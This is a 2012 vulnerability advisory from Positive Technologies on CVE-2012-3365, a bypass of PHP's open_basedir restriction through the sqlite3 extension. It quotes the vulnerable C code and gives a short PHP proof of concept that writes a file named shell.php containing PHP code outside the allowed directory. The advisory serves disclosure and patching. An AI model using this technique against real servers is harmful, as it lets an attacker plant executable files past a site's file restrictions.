Positive TechnologiesPT-2012-14PT-2012-14: Security Restrictions Bypass in PHP
5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:L/Au:N/C:N/I:P/A:N
0.008 Low
EPSS
Percentile
79.8%
PT-2012-14: Security Restrictions Bypass in PHP
Vulnerable software
PHP
Version: 5.4.4 and earlier; 5.3.14 and earlier
Application link:
<http://php.net/>
Severity level
Severity level: Medium
Impact: Security Restrictions Bypass
Access Vector: Remote
CVSS v2:
Base Score: 5.0
Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N)
CVE: CVE-2012-3365
Software description
PHP (Hypertext Preprocessor) is a general-purpose script programming language that is widely used to develop web applications.
Vulnerability description
Positive Research Center detected “Security Restrictions Bypass” vulnerability in PHP application.
PHP 5.4.4/5.3.14 and earlier allows attackers to bypass open_basedir directive. The reason is that the system checks database title in PHP extention sqlite/sqlite3 and libsqlite in different ways. An attacker can create a file in sqlite database format outside open_basedir.
Vulnerability exists in /ext/sqlite3/sqlite3.c file. Here is the vulnerable code:
PHP_METHOD(sqlite3, open) { ... if (strncmp(filename, ":memory:", 8) != 0) { ... if (php_check_open_basedir(fullpath TSRMLS_CC)) { ... } } else { fullpath = estrdup(filename); }
Vulnerability exists in /ext/sqlite3/libsqlite/sqlite3.c file. Here is the vulnerable code:
const int isMemdb = (zFilename && strcmp(zFilename, ":memory:")==0) || (isTempDb && sqlite3TempInMemory(db));
Exploitation example:
The following PHP code allows attackers to create SQLite database outside open_basedir.
<?php mkdir(':memory:'); $database = new SQLite3(":memory:/../../shell.php"); $database->exec("CREATE TABLE foo (bar STRING)"); $database->exec("INSERT INTO foo (bar) VALUES ('<?php phpinfo(); ?>')"); $database->close(); rmdir(':memory:'); ?>
How to fix
Update your software up to the latest version.
Advisory status
22.06.2012 - Vendor is notified
22.06.2012 - Vendor gets vulnerability details
19.07.2012 - Vendor releases fixed version and details
04.02.2013 - Public disclosure
Credits
The vulnerability has discovered by Sergey Bobrov, Positive Research Center (Positive Technologies Company)
References
<http://en.securitylab.ru/lab/PT-2012-14>
Reports on the vulnerabilities previously discovered by Positive Research:
<http://ptsecurity.com/research/advisory/>
<http://en.securitylab.ru/lab/>
References
Related
5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:L/Au:N/C:N/I:P/A:N
0.008 Low
EPSS
Percentile
79.8%